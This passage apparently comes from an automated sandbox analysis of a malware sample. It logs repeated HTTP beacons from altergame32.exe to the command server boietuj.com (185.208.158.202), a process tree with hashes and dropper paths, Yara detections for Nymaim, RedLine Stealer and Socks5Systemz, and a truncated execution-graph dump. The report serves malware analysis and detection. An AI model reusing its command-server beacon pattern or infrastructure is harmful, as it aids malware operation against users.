Nov 20, 2024 05:04:05.562829018 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:06.232191086 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 50051 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:06.375147104 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:07.074831009 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 48 | Source IP: 192.168.2.4 | Source Port: 50052 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:07.203347921 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:07.930809975 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 49 | Source IP: 192.168.2.4 | Source Port: 50053 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:08.056974888 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:08.770709991 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Nov 20, 2024 05:04:08.878520012 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:09.241702080 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 50054 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:09.369337082 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:10.097054958 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20
Nov 20, 2024 05:04:10.206680059 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:10.464906931 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 50055 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:10.588433981 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:11.292295933 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 52 | Source IP: 192.168.2.4 | Source Port: 50056 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:12.356204033 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:13.148518085 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 53 | Source IP: 192.168.2.4 | Source Port: 50057 | Destination IP: 185.208.158.202 | Destination Port: 80 | PID: 2488 | Process: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 05:04:13.274492979 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
Host: boietuj.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Nov 20, 2024 05:04:13.978082895 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Wed, 20 Nov 2024 04:04:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                54 | 192.168.2.4 | 50058 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:04:14.103496075 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:14.830722094 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:04:14.945848942 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:15.203723907 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                55 | 192.168.2.4 | 50059 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:04:15.321496964 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:16.026043892 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                56 | 192.168.2.4 | 50060 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:04:16.150794029 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:16.852190971 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                57 | 192.168.2.4 | 50061 | 185.208.158.202 | 80 | 2488 | C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                Nov 20, 2024 05:04:16.977709055 CET | 322 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:04:17.704370022 CET | 220 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:04:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Target ID:0
                                                                Start time:23:02:12
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x400000
                                                                File size:438'784 bytes
                                                                MD5 hash:5237853DBEBAEFB1DFA86130DD1D39FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:23:02:12
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x400000
                                                                File size:438'784 bytes
                                                                MD5 hash:5237853DBEBAEFB1DFA86130DD1D39FA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:23:02:21
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
                                                                Imagebase:0x400000
                                                                File size:4'065'622 bytes
                                                                MD5 hash:98C5D582966DD7E46FF73E7D6D62B87D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:3
                                                                Start time:23:02:21
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp" /SL5="$403E6,3817417,54272,C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe"
                                                                Imagebase:0x400000
                                                                File size:704'000 bytes
                                                                MD5 hash:62FDBBA6364B54BBE42B437284A2963C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 3%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:4
                                                                Start time:23:02:23
                                                                Start date:19/11/2024
                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\system32\net.exe" pause alter_game_11196
                                                                Imagebase:0x50000
                                                                File size:47'104 bytes
                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe" -i
                                                                Imagebase:0x400000
                                                                File size:4'255'772 bytes
                                                                MD5 hash:C1DEEF6663EFF952E8990193B3452A2F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\net1 pause alter_game_11196
                                                                Imagebase:0x170000
                                                                File size:139'776 bytes
                                                                MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:23:02:24
                                                                Start date:19/11/2024
                                                                Path:C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe"
                                                                Imagebase:0x8f0000
                                                                File size:4'608 bytes
                                                                MD5 hash:F328A95046E3A2514C36347EAEC911C0
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 54%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:true

                                                                  Execution Graph

                                                                  Execution Coverage:3.8%
                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                  Signature Coverage:7.7%
                                                                  Total number of Nodes:1346
                                                                  Total number of Limit Nodes:36
19717 40b63b 19710->19717 19720 407e83 ___freetlocinfo 67 API calls 19710->19720 19731 40b6e8 19711->19731 19761 40e325 19711->19761 19714 407e83 ___freetlocinfo 67 API calls 19712->19714 19716 40b6a8 19714->19716 19722 407e83 ___freetlocinfo 67 API calls 19716->19722 19724 407e83 ___freetlocinfo 67 API calls 19717->19724 19736 40b65c 19717->19736 19718 407e83 ___freetlocinfo 67 API calls 19725 40b669 19718->19725 19719 40b72d 19726 407e83 ___freetlocinfo 67 API calls 19719->19726 19727 40b630 19720->19727 19721 407e83 ___freetlocinfo 67 API calls 19721->19731 19730 40b6b6 19722->19730 19723 407e83 67 API calls ___freetlocinfo 19723->19731 19732 40b651 19724->19732 19733 407e83 ___freetlocinfo 67 API calls 19725->19733 19728 40b733 19726->19728 19737 40e4ff 19727->19737 19728->19689 19734 407e83 ___freetlocinfo 67 API calls 19730->19734 19731->19719 19731->19723 19753 40e4ba 19732->19753 19733->19708 19734->19711 19736->19718 19738 40e50c 19737->19738 19752 40e589 19737->19752 19739 40e51d 19738->19739 19740 407e83 ___freetlocinfo 67 API calls 19738->19740 19741 40e52f 19739->19741 19743 407e83 ___freetlocinfo 67 API calls 19739->19743 19740->19739 19742 40e541 19741->19742 19744 407e83 ___freetlocinfo 67 API calls 19741->19744 19745 40e553 19742->19745 19746 407e83 ___freetlocinfo 67 API calls 19742->19746 19743->19741 19744->19742 19747 40e565 19745->19747 19748 407e83 ___freetlocinfo 67 API calls 19745->19748 19746->19745 19749 407e83 ___freetlocinfo 67 API calls 19747->19749 19751 40e577 19747->19751 19748->19747 19749->19751 19750 407e83 ___freetlocinfo 67 API calls 19750->19752 19751->19750 19751->19752 19752->19717 19754 40e4c7 19753->19754 19760 40e4fb 19753->19760 19755 40e4d7 19754->19755 19756 407e83 ___freetlocinfo 67 API calls 19754->19756 19757 40e4e9 19755->19757 19758 407e83 ___freetlocinfo 67 API calls 19755->19758 19756->19755 19759 407e83 ___freetlocinfo 67 API calls 19757->19759 19757->19760 19758->19757 19759->19760 19760->19736 19762 40e336 
19761->19762 19848 40b6e1 19761->19848 19763 407e83 ___freetlocinfo 67 API calls 19762->19763 19764 40e33e 19763->19764 19765 407e83 ___freetlocinfo 67 API calls 19764->19765 19766 40e346 19765->19766 19767 407e83 ___freetlocinfo 67 API calls 19766->19767 19768 40e34e 19767->19768 19769 407e83 ___freetlocinfo 67 API calls 19768->19769 19770 40e356 19769->19770 19771 407e83 ___freetlocinfo 67 API calls 19770->19771 19772 40e35e 19771->19772 19773 407e83 ___freetlocinfo 67 API calls 19772->19773 19774 40e366 19773->19774 19775 407e83 ___freetlocinfo 67 API calls 19774->19775 19776 40e36d 19775->19776 19777 407e83 ___freetlocinfo 67 API calls 19776->19777 19778 40e375 19777->19778 19779 407e83 ___freetlocinfo 67 API calls 19778->19779 19780 40e37d 19779->19780 19781 407e83 ___freetlocinfo 67 API calls 19780->19781 19782 40e385 19781->19782 19783 407e83 ___freetlocinfo 67 API calls 19782->19783 19784 40e38d 19783->19784 19785 407e83 ___freetlocinfo 67 API calls 19784->19785 19786 40e395 19785->19786 19787 407e83 ___freetlocinfo 67 API calls 19786->19787 19788 40e39d 19787->19788 19789 407e83 ___freetlocinfo 67 API calls 19788->19789 19790 40e3a5 19789->19790 19791 407e83 ___freetlocinfo 67 API calls 19790->19791 19792 40e3ad 19791->19792 19793 407e83 ___freetlocinfo 67 API calls 19792->19793 19794 40e3b5 19793->19794 19795 407e83 ___freetlocinfo 67 API calls 19794->19795 19796 40e3c0 19795->19796 19797 407e83 ___freetlocinfo 67 API calls 19796->19797 19798 40e3c8 19797->19798 19799 407e83 ___freetlocinfo 67 API calls 19798->19799 19800 40e3d0 19799->19800 19801 407e83 ___freetlocinfo 67 API calls 19800->19801 19802 40e3d8 19801->19802 19803 407e83 ___freetlocinfo 67 API calls 19802->19803 19804 40e3e0 19803->19804 19805 407e83 ___freetlocinfo 67 API calls 19804->19805 19806 40e3e8 19805->19806 19807 407e83 ___freetlocinfo 67 API calls 19806->19807 19808 40e3f0 19807->19808 19809 407e83 ___freetlocinfo 67 API calls 19808->19809 19810 40e3f8 19809->19810 19811 407e83 
___freetlocinfo 67 API calls 19810->19811 19812 40e400 19811->19812 19813 407e83 ___freetlocinfo 67 API calls 19812->19813 19814 40e408 19813->19814 19815 407e83 ___freetlocinfo 67 API calls 19814->19815 19816 40e410 19815->19816 19817 407e83 ___freetlocinfo 67 API calls 19816->19817 19818 40e418 19817->19818 19819 407e83 ___freetlocinfo 67 API calls 19818->19819 19820 40e420 19819->19820 19821 407e83 ___freetlocinfo 67 API calls 19820->19821 19822 40e428 19821->19822 19823 407e83 ___freetlocinfo 67 API calls 19822->19823 19824 40e430 19823->19824 19825 407e83 ___freetlocinfo 67 API calls 19824->19825 19826 40e438 19825->19826 19827 407e83 ___freetlocinfo 67 API calls 19826->19827 19828 40e446 19827->19828 19829 407e83 ___freetlocinfo 67 API calls 19828->19829 19830 40e451 19829->19830 19831 407e83 ___freetlocinfo 67 API calls 19830->19831 19832 40e45c 19831->19832 19833 407e83 ___freetlocinfo 67 API calls 19832->19833 19834 40e467 19833->19834 19835 407e83 ___freetlocinfo 67 API calls 19834->19835 19836 40e472 19835->19836 19837 407e83 ___freetlocinfo 67 API calls 19836->19837 19838 40e47d 19837->19838 19839 407e83 ___freetlocinfo 67 API calls 19838->19839 19840 40e488 19839->19840 19841 407e83 ___freetlocinfo 67 API calls 19840->19841 19842 40e493 19841->19842 19843 407e83 ___freetlocinfo 67 API calls 19842->19843 19844 40e49e 19843->19844 19845 407e83 ___freetlocinfo 67 API calls 19844->19845 19846 40e4a9 19845->19846 19847 407e83 ___freetlocinfo 67 API calls 19846->19847 19847->19848 19848->19721 19849->19692 19851 40d9b3 19850->19851 19860 40d912 19850->19860 19852 409a7a __calloc_impl 6 API calls 19851->19852 19853 40d9b9 19852->19853 19854 405968 _strcat_s 66 API calls 19853->19854 19867 40d9ab 19854->19867 19855 407717 __FF_MSGBANNER 66 API calls 19859 40d923 19855->19859 19856 40756c __NMSG_WRITE 66 API calls 19856->19859 19858 40d96f HeapAlloc 19858->19860 19859->19855 19859->19856 19859->19858 19859->19860 19868 407024 19859->19868 19860->19859 19862 
